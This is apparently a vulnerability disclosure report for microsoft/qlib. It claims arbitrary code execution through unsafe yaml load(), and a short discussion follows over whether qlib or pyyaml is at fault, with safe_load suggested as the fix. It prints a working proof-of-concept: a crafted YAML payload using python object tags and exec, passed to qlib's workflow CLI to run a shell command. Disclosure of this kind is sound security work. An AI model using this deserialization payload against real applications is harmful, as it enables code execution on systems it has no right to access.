Arbitrary Code Execution in Microsoft/qlib

[B3EF]

Description

Arbitrary Code Excecution in microsoft/qlib.
Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment.

Technical Description

This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load() in yaml

Exploit code

Python File

import os
import qlib.workflow.cli as cli

exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('exploit.yml','w+').write(exploit)
cli.workflow('exploit.yml','workflow','/tmp')
os.system('rm exploit.yml')

POC

• Install qlib using pip
• Run the exploit code

💥 Impact

code execution

✅ Checklist

• Created and populated the README.md and vulnerability.json files
• Provided the repository URL and any applicable permalinks
• Defined all the applicable weaknesses (CWEs)
• Proposed the CVSS vector items i.e. User Interaction, Attack Complexity
• Checked that the vulnerability affects the latest version of the package released
• Checked that a fix does not currently exist that remediates this vulnerability
• Complied with all applicable laws

[adam-nygate]

@B3EF this seems like an issue in a known vulnerable dependency of the project, rather than a vulnerability in the project itself. Closing for now, but please let me know if you feel differently.

[mzfr]

@B3EF This is not an issue with the qlib but instead the dependency used in that project i.e pyyaml[1] & ruamel[2].

Also you can see that the exploit that you are passing is getting loaded by the yaml package here.

So pyyaml is the real culprit behind this issue.

[B3EF]

@B3EF This is not an issue with the qlib but instead the dependency used in that project i.e pyyaml[1] & ruamel[2].

Also you can see that the exploit that you are passing is getting loaded by the yaml package here.

So pyyaml is the real culprit behind this issue.

hi @mzfr ,
but pyyaml and ruamel.yaml have an alternate solution to fix it, that's why @adam-nygate have reopened my PR's.
any way its ain't a 0day one <3

[Mik317]

@B3EF This is not an issue with the qlib but instead the dependency used in that project i.e pyyaml[1] & ruamel[2].

Also you can see that the exploit that you are passing is getting loaded by the yaml package here.

So pyyaml is the real culprit behind this issue.

I think @B3EF is right 😄
All the deserialization bugs occurs because the deserializer used allows, when user-input is supplied and not checked, to run malicious code. The pyyaml library for example allows to use the safe_load function which is better to handle user input of this type.

In this case the fault isn't of the deserialization library, which can handle every input with load but of the projects who's not using the safe_load alternative. It could be possible also restrict through a overriding class in case some attributes (malicious) need to be handled by the qlib library.

Cheers,
Mik